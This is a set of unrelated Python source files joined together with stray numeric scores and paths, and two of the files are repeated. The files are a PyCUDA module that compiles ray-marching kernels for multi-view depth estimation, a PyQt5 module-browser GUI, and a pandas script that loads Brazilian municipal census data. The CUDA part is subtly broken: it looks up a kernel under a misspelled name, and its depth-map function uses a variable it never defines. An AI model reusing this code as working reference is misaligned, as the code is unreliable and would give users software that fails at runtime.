estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marching(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marching")
cuda_fp.prepare("i" + "P"*9)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
        blocks = n_rays // threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata
)
return fp
def batch_mvcnn_voxel_traversal_with_ray_marching_with_depth_estimation(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers. Finally directly convert the per voxel depth distribution to a depth map
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
    __global__ void batch_mvcnn_planes_voxels_with_ray_marching_with_depth(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new,
float * depth_map
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
// We need to find the voxel center with the highest probability
// based on the S_new
float * Sr = S_new + r*$max_voxels;
float max = -INFINITY;
int max_idx = 0;
for (int i=0; i<$max_voxels; i++) {
if (Sr[i] > max) {
max_idx = i;
max = Sr[i];
}
}
// Associate the voxel_center with id max_idx with a 3D point in
// world coordinates
int idx_x, idx_y, idx_z;
int dim_x = 3*$grid_y*$grid_z;
int dim_y = 3*$grid_z;
int dim_z = 3;
idx_x = ray_voxel_indices[3*$max_voxels*r + 3*max_idx];
idx_y = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 1];
idx_z = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 2];
float point[3];
for (int i=0; i<3; i++) {
point[i] = voxel_grid[idx_x*dim_x + idx_y*dim_y + idx_z*dim_z + i];
}
// Get the distance from the camera center
float sum = 0.0;
for (int i=0; i<3; i++) {
sum += pow(point[i] - camera_center[i], 2);
}
depth_map[r] = sqrt(sum);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth")
cuda_fp.prepare("i" + "P"*10)
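    # Same prepared signature as the previous kernel, plus a tenth pointer for
    # the per-ray depth map output.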
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
depth_map,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
        blocks = n_rays // threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata,
depth_map.gpudata
)
return fp
def perform_mvcnn_with_ray_marching_and_voxel_mapping(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
# Extract the numbers of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
    # Make sure we have one projection matrix per view
    assert len(P) == N
    # Move to GPU to save some time from copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
fp = batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
    # Start iterating over the batches of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
)
idxs = ray_idxs[i:i+batch_size]
ray_voxel_indices[idxs] = ray_voxel_indices_gpu.get()[:len(idxs)]
ray_voxel_count[idxs] = ray_voxel_count_gpu.get()[:len(idxs)]
S_new[idxs] = s_gpu.get()[:len(idxs)]
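# Illustrative usage sketch (an assumption, not part of the original module):
# array shapes are inferred from the function above -- features come from N
# views on a (H + padding + 1) x (W + padding + 1) grid, the voxel grid holds
# the 3D voxel centers as a (3, Gx, Gy, Gz) array, and the per-ray output
# buffers are preallocated by the caller. Running it requires PyCUDA and a
# CUDA-capable device; the projection-matrix shapes are assumptions.
def _example_perform_mvcnn_usage():
    n_rays, M, D, N, F, H, W, padding = 128, 32, 64, 4, 8, 120, 160, 3
    features = np.random.rand(N, H + padding + 1, W + padding + 1, F).astype(np.float32)
    P = [np.random.rand(3, 4).astype(np.float32) for _ in range(N)]  # assumed 3x4 projection matrices
    P_inv = np.random.rand(3, 4).astype(np.float32)  # hypothetical shape, whatever the sampling scheme expects
    camera_center = np.random.rand(3).astype(np.float32)
    bbox = np.array([0, 0, 0, 1, 1, 1], dtype=np.float32)
    voxel_grid = np.random.rand(3, 16, 16, 16).astype(np.float32)
    ray_idxs = np.arange(n_rays, dtype=np.int32)
    ray_voxel_indices = np.zeros((n_rays, M, 3), dtype=np.int32)
    ray_voxel_count = np.zeros((n_rays,), dtype=np.int32)
    S_new = np.zeros((n_rays, M), dtype=np.float32)
    perform_mvcnn_with_ray_marching_and_voxel_mapping(
        ray_idxs, features, P, P_inv, camera_center, bbox, voxel_grid,
        ray_voxel_indices, ray_voxel_count, S_new, padding, D,
        batch_size=n_rays
    )
    return S_new
# NOTE: the variant below originally reused the name of the function above,
# silently shadowing it; it is renamed here (assumed intent) because it also
# produces a per-pixel depth map.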
def perform_mvcnn_with_ray_marching_and_voxel_mapping_with_depth(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
# Extract the numbers of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
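    # NOTE: `ray_voxel_indices` is not a parameter of this depth-map variant,
    # so the next line would raise a NameError as written; the maximum number
    # of marched voxels (M) presumably needs to be supplied explicitly.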
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
    # Make sure we have one projection matrix per view
    assert len(P) == N
    # Move to GPU to save some time from copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
depth_map = to_gpu(
        np.zeros(H*W, dtype=np.float32)
)
    fp = batch_mvcnn_voxel_traversal_with_ray_marching_with_depth_estimation(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
    # Start iterating over the batches of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
depth_map
)
return depth_map.get().reshape(W, H).T | 0.902526 | 0.61396 |
import sys
import pkgutil as pkg
# pip install PyQt5 to install the library
from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QLineEdit, QTextEdit, QListWidget, QComboBox, QVBoxLayout, QHBoxLayout
from PyQt5.QtCore import QStringListModel, QFile, QTextStream, Qt
from PyQt5.QtGui import QIcon
import PyQt5.QtWidgets
import PyQt5.QtSql
import PyQt5.QtMultimedia
import PyQt5.QtWebEngineWidgets
import PyQt5.QtWebEngine
import PyQt5.QtWebEngineCore
import PyQt5.QtPositioning
import PyQt5.QtNetwork
# Based on your imported modules
class HelperText(QTextEdit):
def __init__(self, obj):
super().__init__()
self.setStyleSheet('''
background-color: white;
color: black;
font-size: 35px;
''')
self.resize(1200, 1000)
self.setWindowTitle('Help Information')
self.setReadOnly(True)
help_text = obj.__doc__
self.setText(help_text)
class PythonNavigator(QWidget):
def __init__(self):
super().__init__()
self.resize(1600, 1200)
self.setWindowTitle('Qt Module Navigation')
self.setWindowIcon(self.style().standardIcon(0))
self.module_object = None
self.model = None
self.layout = QVBoxLayout()
available_modules = ('QtWidgets', 'QtCore', 'QtGui', 'QtSql', 'QtNetwork', 'QtPositioning', 'QtWebEngine', 'QtWebEngineCore', 'QtWebEngineWidgets')
# combobox widget
self.comboModules = QComboBox()
self.comboModules.addItems(available_modules)
self.comboModules.currentIndexChanged.connect(self.updateModuleList)
self.layout.addWidget(self.comboModules)
self.search = QLineEdit()
self.search.textChanged.connect(self.filter_items)
self.layout.addWidget(self.search)
layoutLabels = QHBoxLayout()
self.layout.addLayout(layoutLabels)
self.labelSelectedClass = QLabel('Selected Class: ')
        self.labelSelectedMemeber = QLabel('Selected Member: ')
layoutLabels.addWidget(self.labelSelectedClass)
layoutLabels.addWidget(self.labelSelectedMemeber)
layoutListWidgets = QHBoxLayout()
self.layout.addLayout(layoutListWidgets)
self.listWidgetClasses = QListWidget()
self.listWidgetClasses.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetClasses.itemSelectionChanged.connect(self.updateClassList)
self.listWidgetClasses.doubleClicked.connect(lambda : self.displayHelper('class'))
layoutListWidgets.addWidget(self.listWidgetClasses)
self.listWidgetMemebers = QListWidget()
self.listWidgetMemebers.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetMemebers.itemSelectionChanged.connect(self.updateMemeberlabel)
self.listWidgetMemebers.doubleClicked.connect(lambda : self.displayHelper('member'))
layoutListWidgets.addWidget(self.listWidgetMemebers)
layoutStatus = QHBoxLayout()
self.status = QLabel()
buyMeACoffee = QLabel("Buy Me a Coffee --> " + "<a href=\"https://www.paypal.com/paypalme/jiejenn/5\" style=\"color:#d4fcfb\">Click Me</a>")
buyMeACoffee.setTextFormat(Qt.RichText)
buyMeACoffee.setTextInteractionFlags(Qt.TextBrowserInteraction)
buyMeACoffee.setOpenExternalLinks(True)
buyMeACoffee.setStyleSheet('color: #ffffff')
appVersion = QLabel('Created by <NAME> (v1.2)')
layoutStatus.addWidget(self.status)
layoutStatus.addStretch()
layoutStatus.addWidget(buyMeACoffee, alignment=Qt.AlignRight)
layoutStatus.addWidget(appVersion, alignment=Qt.AlignRight)
self.layout.addLayout(layoutStatus)
self.setLayout(self.layout)
self.updateModuleList()
def displayHelper(self, by_type: str):
if by_type == 'class':
class_name = self.listWidgetClasses.currentItem().text()
obj = getattr(self.module_object, class_name)
elif by_type == 'member':
class_name = self.listWidgetClasses.currentItem().text()
memeber_name = self.listWidgetMemebers.currentItem().text()
obj = getattr(getattr(self.module_object, class_name), memeber_name)
else:
self.status.setText('No information available')
return
self.help = HelperText(obj)
self.help.show()
def updateMemeberlabel(self):
try:
member_name = self.listWidgetMemebers.currentItem().text()
            self.labelSelectedMemeber.setText('Selected Member: {0}'.format(member_name))
except Exception as e:
self.status.setText(str(e))
def updateClassList(self):
self.listWidgetMemebers.clear()
class_name = self.listWidgetClasses.currentItem().text()
try:
obj = getattr(self.module_object, class_name)
except AttributeError as e:
self.status.setText(str(e))
return
self.listWidgetMemebers.addItems(dir(obj))
self.status.clear()
try:
self.labelSelectedClass.setText('Selected Class: {0}'.format(class_name))
        except Exception as e:
self.status.setText(str(e))
def updateModuleList(self):
module_name = self.comboModules.currentText()
self.module_object = sys.modules.get('PyQt5.' + module_name)
self.reset_fields()
if self.module_object is None:
self.status.setText('Information is not available')
return
module_dir = dir(self.module_object)
self.model = QStringListModel()
self.model.setStringList(module_dir)
self.listWidgetClasses.addItems(module_dir)
self.status.clear()
def reset_fields(self):
self.listWidgetClasses.clear()
self.listWidgetMemebers.clear()
self.labelSelectedClass.setText('Selected Class: ')
        self.labelSelectedMemeber.setText('Selected Member: ')
def filter_items(self):
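        # The QStringListModel holds the same strings, in the same order, as
        # the rows of listWidgetClasses (both are filled from module_dir in
        # updateModuleList), so its row indices can be used to hide or show
        # the list-widget rows that do not match the search text.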
filtered_text = str(self.search.text()).lower()
if self.model:
for row in range(self.model.rowCount()):
if filtered_text in str(self.model.index(row).data()).lower():
self.listWidgetClasses.setRowHidden(row, False)
else:
self.listWidgetClasses.setRowHidden(row, True)
if __name__ == '__main__':
app = QApplication(sys.argv)
css_file = QFile(r'dark_theme (4k).css')
css_file.open(QFile.ReadOnly)
stream = QTextStream(css_file)
pyNavigator = PythonNavigator()
pyNavigator.setStyleSheet(stream.readAll())
pyNavigator.show()
try:
sys.exit(app.exec_())
except SystemExit:
print('Closing Window...') | pyqt5_module_navigator.py | import sys
import pkgutil as pkg
# pip install PyQt5 to install the library
from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QLineEdit, QTextEdit, QListWidget, QComboBox, QVBoxLayout, QHBoxLayout
from PyQt5.QtCore import QStringListModel, QFile, QTextStream, Qt
from PyQt5.QtGui import QIcon
import PyQt5.QtWidgets
import PyQt5.QtSql
import PyQt5.QtMultimedia
import PyQt5.QtWebEngineWidgets
import PyQt5.QtWebEngine
import PyQt5.QtWebEngineCore
import PyQt5.QtPositioning
import PyQt5.QtNetwork
# Based on your imported modules
class HelperText(QTextEdit):
def __init__(self, obj):
super().__init__()
self.setStyleSheet('''
background-color: white;
color: black;
font-size: 35px;
''')
self.resize(1200, 1000)
self.setWindowTitle('Help Information')
self.setReadOnly(True)
help_text = obj.__doc__
self.setText(help_text)
class PythonNavigator(QWidget):
def __init__(self):
super().__init__()
self.resize(1600, 1200)
self.setWindowTitle('Qt Module Navigation')
self.setWindowIcon(self.style().standardIcon(0))
self.module_object = None
self.model = None
self.layout = QVBoxLayout()
available_modules = ('QtWidgets', 'QtCore', 'QtGui', 'QtSql', 'QtNetwork', 'QtPositioning', 'QtWebEngine', 'QtWebEngineCore', 'QtWebEngineWidgets')
# combobox widget
self.comboModules = QComboBox()
self.comboModules.addItems(available_modules)
self.comboModules.currentIndexChanged.connect(self.updateModuleList)
self.layout.addWidget(self.comboModules)
self.search = QLineEdit()
self.search.textChanged.connect(self.filter_items)
self.layout.addWidget(self.search)
layoutLabels = QHBoxLayout()
self.layout.addLayout(layoutLabels)
self.labelSelectedClass = QLabel('Selected Class: ')
        self.labelSelectedMemeber = QLabel('Selected Member: ')
layoutLabels.addWidget(self.labelSelectedClass)
layoutLabels.addWidget(self.labelSelectedMemeber)
layoutListWidgets = QHBoxLayout()
self.layout.addLayout(layoutListWidgets)
self.listWidgetClasses = QListWidget()
self.listWidgetClasses.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetClasses.itemSelectionChanged.connect(self.updateClassList)
self.listWidgetClasses.doubleClicked.connect(lambda : self.displayHelper('class'))
layoutListWidgets.addWidget(self.listWidgetClasses)
self.listWidgetMemebers = QListWidget()
self.listWidgetMemebers.verticalScrollBar().setStyleSheet('width: 35px')
self.listWidgetMemebers.itemSelectionChanged.connect(self.updateMemeberlabel)
self.listWidgetMemebers.doubleClicked.connect(lambda : self.displayHelper('member'))
layoutListWidgets.addWidget(self.listWidgetMemebers)
layoutStatus = QHBoxLayout()
self.status = QLabel()
buyMeACoffee = QLabel("Buy Me a Coffee --> " + "<a href=\"https://www.paypal.com/paypalme/jiejenn/5\" style=\"color:#d4fcfb\">Click Me</a>")
buyMeACoffee.setTextFormat(Qt.RichText)
buyMeACoffee.setTextInteractionFlags(Qt.TextBrowserInteraction)
buyMeACoffee.setOpenExternalLinks(True)
buyMeACoffee.setStyleSheet('color: #ffffff')
appVersion = QLabel('Created by <NAME> (v1.2)')
layoutStatus.addWidget(self.status)
layoutStatus.addStretch()
layoutStatus.addWidget(buyMeACoffee, alignment=Qt.AlignRight)
layoutStatus.addWidget(appVersion, alignment=Qt.AlignRight)
self.layout.addLayout(layoutStatus)
self.setLayout(self.layout)
self.updateModuleList()
def displayHelper(self, by_type: str):
if by_type == 'class':
class_name = self.listWidgetClasses.currentItem().text()
obj = getattr(self.module_object, class_name)
elif by_type == 'member':
class_name = self.listWidgetClasses.currentItem().text()
memeber_name = self.listWidgetMemebers.currentItem().text()
obj = getattr(getattr(self.module_object, class_name), memeber_name)
else:
self.status.setText('No information available')
return
self.help = HelperText(obj)
self.help.show()
def updateMemeberlabel(self):
try:
member_name = self.listWidgetMemebers.currentItem().text()
            self.labelSelectedMemeber.setText('Selected Member: {0}'.format(member_name))
except Exception as e:
self.status.setText(str(e))
def updateClassList(self):
self.listWidgetMemebers.clear()
class_name = self.listWidgetClasses.currentItem().text()
try:
obj = getattr(self.module_object, class_name)
except AttributeError as e:
self.status.setText(str(e))
return
self.listWidgetMemebers.addItems(dir(obj))
self.status.clear()
try:
self.labelSelectedClass.setText('Selected Class: {0}'.format(class_name))
        except Exception as e:
self.status.setText(str(e))
def updateModuleList(self):
module_name = self.comboModules.currentText()
self.module_object = sys.modules.get('PyQt5.' + module_name)
self.reset_fields()
if self.module_object is None:
self.status.setText('Information is not available')
return
module_dir = dir(self.module_object)
self.model = QStringListModel()
self.model.setStringList(module_dir)
self.listWidgetClasses.addItems(module_dir)
self.status.clear()
def reset_fields(self):
self.listWidgetClasses.clear()
self.listWidgetMemebers.clear()
self.labelSelectedClass.setText('Selected Class: ')
        self.labelSelectedMemeber.setText('Selected Member: ')
def filter_items(self):
filtered_text = str(self.search.text()).lower()
if self.model:
for row in range(self.model.rowCount()):
if filtered_text in str(self.model.index(row).data()).lower():
self.listWidgetClasses.setRowHidden(row, False)
else:
self.listWidgetClasses.setRowHidden(row, True)
if __name__ == '__main__':
app = QApplication(sys.argv)
css_file = QFile(r'dark_theme (4k).css')
css_file.open(QFile.ReadOnly)
stream = QTextStream(css_file)
pyNavigator = PythonNavigator()
pyNavigator.setStyleSheet(stream.readAll())
pyNavigator.show()
try:
sys.exit(app.exec_())
except SystemExit:
print('Closing Window...') | 0.181916 | 0.063715 |
import os
import pandas as pd
import geopandas as gpd
files = ['prop_urban_2000_2010.csv',
'pop_women_2010.csv',
'pop_men_2010.csv',
'idhm_2000_2010.csv',
'estimativas_pop.csv',
'interest_real.csv',
'num_people_age_gender_AP_2010.csv',
'qualification_APs_2010.csv',
'firms_by_APs2010_t0_full.csv',
'firms_by_APs2010_t1_full.csv',
'average_num_members_families_2010.csv'
]
def read_data(path, sep=';'):
return pd.read_csv(path, sep=sep)
def read_mun(data, municipalities, col='cod_mun'):
return data[data[col].isin(municipalities)]
def read_data_aps(data, municipalities, col='AP'):
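    # APs are census weighting areas whose codes start with the 7-digit
    # municipality code, so rows are kept when that prefix matches one of the
    # requested municipalities.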
return data[data[col].astype(str).str[:7].isin([str(m) for m in municipalities])]
def descriptive_stats(data, col):
print(col)
print('max', data[col].max())
print('min', data[col].min())
print('mean', data[col].mean())
print('std', data[col].std())
print('obs', len(data[col]))
print('\n')
if __name__ == '__main__':
p = 'input'
acp = 'BRASILIA'
mun = pd.read_csv('input/ACPs_MUN_CODES.csv', sep=';')
mun = mun[mun['ACPs'] == acp].cod_mun.to_list()
f0 = read_data(os.path.join(p, files[0]))
f0 = read_mun(f0, mun)
descriptive_stats(f0, '2010')
f1 = read_data(os.path.join(p, files[1]))
f1 = read_mun(f1, mun)
f1c = f1.drop('cod_mun', axis=1)
f2 = read_data(os.path.join(p, files[2]))
f2 = read_mun(f2, mun)
f2c = f2.drop('cod_mun', axis=1)
f3 = read_data(os.path.join(p, files[3]))
f3 = read_mun(f3, [2010], 'year')
f3 = read_mun(f3, mun)
descriptive_stats(f3, 'idhm')
f4 = read_data(os.path.join(p, files[4]), ',')
f4 = read_mun(f4, mun, 'mun_code')
f4c = f4.drop('mun_code', axis=1)
f5 = read_data(os.path.join(p, files[5]), ';')
f5d = f5.loc[:240]
descriptive_stats(f5d, 'mortgage')
f6 = read_data(os.path.join(p, files[6]), ';')
f6 = read_mun(f6, mun, 'AREAP')
descriptive_stats(f6, 'num_people')
f7 = read_data(os.path.join(p, files[7]), ',')
f7 = read_data_aps(f7, mun, 'code')
f7c = f7.drop('code', axis=1)
f8 = read_data(os.path.join(p, files[8]))
f9 = read_data(os.path.join(p, files[9]))
f8 = read_data_aps(f8, mun, 'AP')
f9 = read_data_aps(f9, mun, 'AP')
descriptive_stats(f8, 'num_firms')
descriptive_stats(f9, 'num_firms')
f10 = read_data(os.path.join(p, files[10]), ',')
f10 = read_data_aps(f10, mun, 'AREAP')
descriptive_stats(f10, 'avg_num_people')
p1 = 'shapes/2010/areas/DF.shp'
geo_df = gpd.read_file(os.path.join(p, p1))
p2 = 'shapes/2010/areas/GO.shp'
geo_go = gpd.read_file(os.path.join(p, p2))
geo_go = read_data_aps(geo_go, mun, 'mun_code')
# STATE-LEVEL, GENDER
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fertility/fertility_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# Mortality
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
for sex in ['men', 'women']:
p3 = f'mortality/mortality_{sex}_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# FPM
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fpm/{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ',')
t = read_mun(t, mun, 'cod')
out = pd.concat([out, t], axis=0) | auxiliary/read_input_data.py | import os
import pandas as pd
import geopandas as gpd
files = ['prop_urban_2000_2010.csv',
'pop_women_2010.csv',
'pop_men_2010.csv',
'idhm_2000_2010.csv',
'estimativas_pop.csv',
'interest_real.csv',
'num_people_age_gender_AP_2010.csv',
'qualification_APs_2010.csv',
'firms_by_APs2010_t0_full.csv',
'firms_by_APs2010_t1_full.csv',
'average_num_members_families_2010.csv'
]
def read_data(path, sep=';'):
return pd.read_csv(path, sep=sep)
def read_mun(data, municipalities, col='cod_mun'):
return data[data[col].isin(municipalities)]
def read_data_aps(data, municipalities, col='AP'):
return data[data[col].astype(str).str[:7].isin([str(m) for m in municipalities])]
def descriptive_stats(data, col):
print(col)
print('max', data[col].max())
print('min', data[col].min())
print('mean', data[col].mean())
print('std', data[col].std())
print('obs', len(data[col]))
print('\n')
if __name__ == '__main__':
p = 'input'
acp = 'BRASILIA'
mun = pd.read_csv('input/ACPs_MUN_CODES.csv', sep=';')
mun = mun[mun['ACPs'] == acp].cod_mun.to_list()
f0 = read_data(os.path.join(p, files[0]))
f0 = read_mun(f0, mun)
descriptive_stats(f0, '2010')
f1 = read_data(os.path.join(p, files[1]))
f1 = read_mun(f1, mun)
f1c = f1.drop('cod_mun', axis=1)
f2 = read_data(os.path.join(p, files[2]))
f2 = read_mun(f2, mun)
f2c = f2.drop('cod_mun', axis=1)
f3 = read_data(os.path.join(p, files[3]))
f3 = read_mun(f3, [2010], 'year')
f3 = read_mun(f3, mun)
descriptive_stats(f3, 'idhm')
f4 = read_data(os.path.join(p, files[4]), ',')
f4 = read_mun(f4, mun, 'mun_code')
f4c = f4.drop('mun_code', axis=1)
f5 = read_data(os.path.join(p, files[5]), ';')
f5d = f5.loc[:240]
descriptive_stats(f5d, 'mortgage')
f6 = read_data(os.path.join(p, files[6]), ';')
f6 = read_mun(f6, mun, 'AREAP')
descriptive_stats(f6, 'num_people')
f7 = read_data(os.path.join(p, files[7]), ',')
f7 = read_data_aps(f7, mun, 'code')
f7c = f7.drop('code', axis=1)
f8 = read_data(os.path.join(p, files[8]))
f9 = read_data(os.path.join(p, files[9]))
f8 = read_data_aps(f8, mun, 'AP')
f9 = read_data_aps(f9, mun, 'AP')
descriptive_stats(f8, 'num_firms')
descriptive_stats(f9, 'num_firms')
f10 = read_data(os.path.join(p, files[10]), ',')
f10 = read_data_aps(f10, mun, 'AREAP')
descriptive_stats(f10, 'avg_num_people')
p1 = 'shapes/2010/areas/DF.shp'
geo_df = gpd.read_file(os.path.join(p, p1))
p2 = 'shapes/2010/areas/GO.shp'
geo_go = gpd.read_file(os.path.join(p, p2))
geo_go = read_data_aps(geo_go, mun, 'mun_code')
